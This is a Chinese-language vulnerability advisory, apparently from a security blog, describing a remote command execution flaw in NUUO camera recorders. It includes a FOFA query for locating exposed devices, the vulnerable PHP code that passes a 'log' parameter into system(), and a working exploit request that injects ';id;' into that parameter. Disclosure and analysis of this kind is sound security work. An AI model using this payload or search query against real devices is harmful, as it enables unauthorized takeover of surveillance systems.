NUUO摄像机 handle_site_config.php 远程命令执行漏洞


漏洞简介

NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,NUUO摄像头 handle_site_config.php 、 handle_config.php、__debugging_center_utils___.php

存在远程命令执行漏洞,攻击者可以利用此漏洞在服务器上执行任意命令造成服务器失陷。

影响版本

fofa语法

body="www.nuuo.com/eHelpdesk.php"

漏洞分析

handle_site_config.php 业务逻辑如下

<?php
define("LOG_FILE_FOLDER", "/mtd/block4/log");

function print_file($file_fullpath_name)
{
    $cmd = "cat " . $file_fullpath_name;
    echo $file_fullpath_name . "\n\n";
    system($cmd);
}

// Make sure program execution doesn't time out
// Set maximum script execution time in seconds (0 means no limit)
//set_time_limit(0);
?>

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Debugging Center</title>
</head>
<body>

<pre>
<?php
    if (isset($_GET['log']) && !empty($_GET['log']))
    {
        $file_fullpath_name = constant('LOG_FILE_FOLDER') . '/' . basename($_GET['log']);
        print_file($file_fullpath_name);
    }
    else
    {
        die("unknown command.");
    }
?>
</pre>

</body>
</html>

通过 get 获取 log 参数值 拼接进 $file_fullpath_name 再将其代入 print_file 函数执行,而 print_file 函数里将 $file_fullpath_name 拼接进 cat 命令后调用 system 函数执行直接执行导致任意命令执行漏洞。

另外两个文件 handle_config.php、__debugging_center_utils___.php漏洞点和此处一样

漏洞复现

GET /handle_site_config.php?log=;id; HTTP/1.1
Host: nuuo.mrxn.net

成功执行 id 命令,并回显执行结果。


手机扫码阅读

月子会所ERP管理云平台 Page/upload/UploadHandler.ashx 任意文件读取漏洞

月子会所ERP管理云平台 UpLoadHandler.ashx 任意文件上传漏洞

评 论